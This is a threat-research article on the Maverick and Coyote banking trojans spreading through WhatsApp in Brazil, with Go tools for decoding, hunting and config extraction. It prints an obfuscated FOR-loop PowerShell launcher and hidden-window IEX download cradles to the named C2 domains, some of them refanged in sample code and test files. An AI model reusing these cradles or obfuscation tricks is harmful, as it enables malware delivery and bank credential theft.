Brazilian Banks Targeted by Maverick and Coyote Trojans via WhatsApp, Researchers Warn of Sophisticated Threat

Unveiling the Connection: Maverick and Coyote Banking Trojans Targeting Brazilian Financial Institutions

Recent investigations by CyberProof security researchers have revealed significant connections between two sophisticated banking trojans, Maverick and Coyote, both of which are actively targeting Brazilian users and financial institutions. These malware campaigns exhibit striking similarities in their infection methodologies, code structures, and operational behaviors, suggesting a shared origin or collaborative development.

Discovery and Initial Findings

The Maverick banking malware came to light when analysts detected suspicious file downloads occurring through WhatsApp, a popular messaging platform in Brazil. Upon closer examination, these downloads were found to be part of a complex, multi-stage infection process that closely mirrors the tactics employed by the previously identified Coyote malware.

Infection Chain and Technical Analysis

Both Maverick and Coyote initiate their attacks by distributing malicious ZIP files via WhatsApp messages. These archives contain LNK (shortcut) files that, when opened, run heavily obfuscated PowerShell commands designed to evade detection. The obfuscation layers include Base64 over UTF-16LE text, which is exactly the encoding PowerShell's -EncodedCommand (-enc) switch expects, together with string concatenation that assembles the command only at run time.

For instance, the loader assembles the interpreter name through nested cmd FOR loops, binding each loop variable to a fragment of "powershell.exe" so that the literal string never appears on the command line and simple string matching misses it. An analyzed sample demonstrated the following obfuscation pattern:

```
for %y in (pow) do for %c in (er) do for %V in (shel) do for %q in (l.e) do for %A in (xe) do %y%c%V%q%A
REM %y%c%V%q%A expands to powershell.exe
```

Once the -enc argument is decoded, the PowerShell one-liner contacts attacker-controlled infrastructure to fetch the next stage: -w hid hides the console window, and IEX (Invoke-Expression) executes whatever the download returns without writing it to disk. The command is shown below with the encoded argument already decoded and the URL defanged:

```
powershell.exe -w hid -enc IEX (New-Object Net.WebClient).DownloadString('hxxps://zapgrande[.]com/api/itbi/BrDLwQ4tU70z')
```
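The decoding steps just described, as an added example in Go that is not from the CyberProof write-up: it peels the FOR-loop fragment chain to recover the real interpreter name, decodes the -enc argument (Base64 over UTF-16LE), and pulls out and defangs the download URL. The function names are this example's own. The sample command line is constructed here from the fragment pattern quoted above, with the Base64 blob generated from the refanged URL; no real LNK payload is included.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
)

// One "for %v in (frag) do" stage, in interactive cmd syntax (single percent).
var forStage = regexp.MustCompile(`(?i)^for\s+%(\w)\s+in\s+\(([^)]*)\)\s+do\s+`)
var varRef = regexp.MustCompile(`%(\w)`)

// ResolveForChain peels the FOR stages off the front of the command line,
// records which fragment each loop variable carries, and substitutes the
// variables in what remains, yielding the command cmd.exe actually runs.
func ResolveForChain(cmdline string) string {
	bindings := map[byte]string{}
	rest := strings.Join(strings.Fields(cmdline), " ") // undo line wrapping
	for m := forStage.FindStringSubmatchIndex(rest); m != nil; m = forStage.FindStringSubmatchIndex(rest) {
		bindings[rest[m[2]]] = rest[m[4]:m[5]]
		rest = rest[m[1]:]
	}
	return varRef.ReplaceAllStringFunc(rest, func(s string) string {
		if frag, ok := bindings[s[1]]; ok {
			return frag
		}
		return s // not a loop variable: leave untouched
	})
}

// -EncodedCommand (and its -enc / -e abbreviations) takes Base64 over the
// UTF-16LE bytes of the script: the "Base64 and UTF-16LE" layer of the chain.
var encArg = regexp.MustCompile(`(?i)-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)`)

func DecodeEncodedCommand(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	u := make([]uint16, len(raw)/2) // a stray odd trailing byte is dropped
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// EncodeCommand is the forward direction, used here only to build the sample.
func EncodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

var urlPat = regexp.MustCompile(`https?://[^\s'"()]+`)

// Defang makes a recovered URL safe to paste into a report.
func Defang(u string) string {
	return strings.ReplaceAll(strings.Replace(u, "http", "hxxp", 1), ".", "[.]")
}

type Verdict struct {
	Resolved string   // command after FOR substitution
	Script   string   // decoded -enc payload ("" if none present)
	URLs     []string // defanged download URLs found in the payload
}

func AnalyzeLnkCommand(cmdline string) (Verdict, error) {
	v := Verdict{Resolved: ResolveForChain(cmdline)}
	if m := encArg.FindStringSubmatch(v.Resolved); m != nil {
		script, err := DecodeEncodedCommand(m[1])
		if err != nil {
			return v, err
		}
		v.Script = script
		for _, u := range urlPat.FindAllString(script, -1) {
			v.URLs = append(v.URLs, Defang(u))
		}
	}
	return v, nil
}

// Constructed sample: the fragment chain quoted in the write-up followed by
// an -enc blob built here from the refanged download URL.
const sampleScript = "IEX (New-Object Net.WebClient).DownloadString('https://zapgrande.com/api/itbi/BrDLwQ4tU70z')"

func SampleCmdline() string {
	return "for %y in (pow) do for %c in (er) do for %V in (shel) do " +
		"for %q in (l.e) do for %A in (xe) do %y%c%V%q%A -w hid -enc " +
		EncodeCommand(sampleScript)
}

func main() {
	fmt.Println(AnalyzeLnkCommand(SampleCmdline()))
}
```

Feed ResolveForChain the command line extracted from the LNK (for example from its LinkInfo/arguments fields); the resolved string is what should be matched against a detection rule, since the obfuscated form never contains "powershell".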

Persistence Mechanisms and Evasion Strategies

To maintain persistence, the malware drops a batch file into the per-user Windows Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), named HealthApp-<GUID>.bat. Everything in that folder runs at each user logon, so the script re-launches the infection and re-establishes outbound connections to command-and-control servers on domains such as sorvetenopote[.]com and zapgrande[.]com. The fixed HealthApp- prefix and the Startup location together make a simple hunting signature.

Both Maverick and Coyote profile the victim before activating their banking-theft functionality. They check the system's time zone, locale, regional settings and date format to confirm that the machine is in Brazil; if any check fails, the malware terminates, which keeps the banking logic out of sandboxes and analysis machines outside the targeted region. Analysts detonating a sample should therefore set the sandbox's time zone and locale to Brazilian values, otherwise the sample exits before exposing its banking behavior.
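A hunt over the Startup folder for the persistence artifact above, written here in Go as an added example (not CyberProof's tooling). It flags files whose name follows the HealthApp-<GUID>.bat convention and, so that a renamed dropper is still caught, any .bat in the Startup folder that references one of the two C2 domains named in the write-up. The file listing and batch contents are constructed for the demo; the write-up does not quote the dropped file, and the GUID is an arbitrary placeholder.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// File is a constructed stand-in for an on-disk file: the path as it would
// appear under a user profile, plus the file's text.
type File struct{ Path, Content string }

// Per-user Startup folder; anything here runs at logon.
const startupDir = "/appdata/roaming/microsoft/windows/start menu/programs/startup/"

// Reported naming convention for the dropped persistence script.
var healthAppName = regexp.MustCompile(
	`(?i)^HealthApp-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.bat$`)

// C2 domains named in the write-up, refanged for comparison.
var knownC2 = map[string]bool{"sorvetenopote.com": true, "zapgrande.com": true}

var hostPat = regexp.MustCompile(`(?i)https?://([a-z0-9.-]+)`)

type Finding struct {
	Path    string
	NameHit bool     // filename matches HealthApp-<GUID>.bat
	C2Hits  []string // referenced hosts that are on the known-C2 list
	Hosts   []string // every host referenced, for triage of new infrastructure
}

func normPath(p string) string { return strings.ToLower(strings.ReplaceAll(p, `\`, "/")) }

// HuntStartup flags a file when its name follows the reported convention, or
// when a .bat in the Startup folder reaches out to a known C2 domain, so a
// dropper that was renamed still surfaces.
func HuntStartup(files []File) []Finding {
	var out []Finding
	for _, f := range files {
		p := normPath(f.Path)
		if !strings.Contains(p, startupDir) {
			continue
		}
		base := p[strings.LastIndex(p, "/")+1:]
		fd := Finding{Path: f.Path, NameHit: healthAppName.MatchString(base)}
		for _, m := range hostPat.FindAllStringSubmatch(f.Content, -1) {
			h := strings.ToLower(m[1])
			fd.Hosts = append(fd.Hosts, h)
			if knownC2[h] {
				fd.C2Hits = append(fd.C2Hits, h)
			}
		}
		if fd.NameHit || (strings.HasSuffix(base, ".bat") && len(fd.C2Hits) > 0) {
			out = append(out, fd)
		}
	}
	return out
}

// SampleFiles is a constructed listing: one dropper with the reported name,
// one renamed dropper, one benign backup script, one file outside Startup.
func SampleFiles() []File {
	const startup = `C:\Users\ana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\`
	return []File{
		{startup + "HealthApp-3f2504e0-4f89-11d3-9a0c-0305e82c3301.bat",
			"@echo off\r\npowershell -w hid -c \"IEX (New-Object Net.WebClient).DownloadString('https://sorvetenopote.com/api/x')\"\r\n"},
		{startup + "update.bat",
			"@echo off\r\npowershell -w hid -c \"IEX (New-Object Net.WebClient).DownloadString('https://zapgrande.com/api/y')\"\r\n"},
		{startup + "backup.bat",
			"@echo off\r\nxcopy /E D:\\docs E:\\backup\r\n"},
		{`C:\Users\ana\Downloads\HealthApp-3f2504e0-4f89-11d3-9a0c-0305e82c3301.bat`,
			"echo staged, not yet in Startup\r\n"},
	}
}

func main() {
	for _, fd := range HuntStartup(SampleFiles()) {
		fmt.Printf("%s name=%v c2=%v hosts=%v\n", fd.Path, fd.NameHit, fd.C2Hits, fd.Hosts)
	}
}
```

On a real host, populate the File slice by walking each profile's Startup folder; the Hosts field is worth keeping in the output even when nothing matches the known list, because it is where new C2 infrastructure shows up first.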

Encryption Techniques and Targeted Institutions

A notable similarity between the two families is how they store their banking URLs: each target string is kept Base64-encoded, and at run time it is decrypted with AES in CBC mode and GZIP-decompressed before use. This identical decoding routine, together with nearly identical banking-monitoring code, strongly indicates a shared development origin.
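A config-extractor sketch for that storage format, added here in Go with only the standard library and not taken from the malware or the write-up. It assumes the layering Base64(AES-CBC(PKCS#7(GZIP(text)))), so decoding runs Base64 decode, AES-CBC decrypt, unpad, gunzip; the write-up names the primitives but not the order or the padding, so both are assumptions, and the key, IV and URL list below are placeholders constructed for the demo. Against a real sample, replace demoKey and demoIV with the values recovered from the binary.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"strings"
)

// Placeholder key and IV, constructed for the demo. A real extractor is
// pointed at the values recovered from the sample.
var (
	demoKey = []byte("0123456789abcdef0123456789abcdef") // 32 bytes: AES-256
	demoIV  = []byte("fedcba9876543210")                 // 16 bytes: one CBC block
)

// PKCS#7 padding, the .NET AES default; assumed, not stated in the write-up.
func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 {
		return nil, errors.New("empty plaintext")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding: wrong key or IV?")
	}
	return b[:len(b)-n], nil
}

// DecodeStoredString reverses the assumed layering:
// Base64 -> AES-CBC decrypt -> PKCS#7 unpad -> gunzip -> text.
func DecodeStoredString(b64 string, key, iv []byte) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not whole AES blocks")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	if pt, err = pkcs7Unpad(pt, aes.BlockSize); err != nil {
		return "", err
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt)) // rejects a garbled gzip header
	if err != nil {
		return "", err
	}
	defer zr.Close()
	out, err := io.ReadAll(zr)
	return string(out), err
}

// EncodeStoredString is the forward transform, used here only to build the sample.
func EncodeStoredString(text string, key, iv []byte) string {
	var gz bytes.Buffer
	zw := gzip.NewWriter(&gz)
	zw.Write([]byte(text)) // writes into a bytes.Buffer cannot fail
	zw.Close()
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err) // demo only: a bad key length is a programming error here
	}
	pt := pkcs7Pad(gz.Bytes(), aes.BlockSize)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(ct)
}

// Constructed stand-in for the stored list: generic hostnames, not the real targets.
var sampleTargets = []string{
	"https://internetbanking.example-bank-a.com.br",
	"https://www.example-bank-b.com.br/ib/login",
	"https://app.example-broker-c.com.br",
}

// SampleBlob is the Base64 string a binary would carry, built from the list above.
func SampleBlob() string {
	return EncodeStoredString(strings.Join(sampleTargets, "\n"), demoKey, demoIV)
}

func main() {
	fmt.Println(DecodeStoredString(SampleBlob(), demoKey, demoIV))
}
```

Two failure modes are worth knowing when the recovered key or IV is wrong: a wrong key garbles every block, so the PKCS#7 check almost always fails first; a wrong IV garbles only the first block, so the padding is intact and the error surfaces one step later as an invalid gzip header.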

The malware monitors web browsers including Chrome, Firefox, Edge, Opera, and Brave for connections to over 50 Brazilian financial institutions. Upon detecting a connection to one of these institutions, the malware can execute overlay attacks, keylogging, and other techniques to steal sensitive banking credentials and financial information.

Implications and Recommendations

The discovery of the strong links between Maverick and Coyote underscores the evolving sophistication of cyber threats targeting the financial sector in Brazil. The use of popular communication platforms like WhatsApp for malware distribution highlights the need for increased vigilance among users and organizations.

To mitigate the risks associated with these malware campaigns, it is recommended that individuals and organizations:

– Exercise Caution with Unsolicited Messages: Be wary of unexpected messages containing attachments or links, even if they appear to come from known contacts.

– Implement Robust Security Measures: Keep endpoint protection current, and add detection for the launch pattern this chain uses: powershell.exe started from a shortcut with a hidden window (-w hid) and an encoded command (-enc), and new .bat files appearing in the Startup folder.

– Educate Users: Conduct regular training sessions to inform users about the latest phishing tactics and social engineering techniques employed by cybercriminals.

– Monitor Network Traffic: Watch for connections to the domains named above (sorvetenopote[.]com, zapgrande[.]com) and for other unexpected outbound connections or data exfiltration from endpoints.

By adopting these proactive measures, individuals and organizations can enhance their defenses against the growing threat posed by banking trojans like Maverick and Coyote.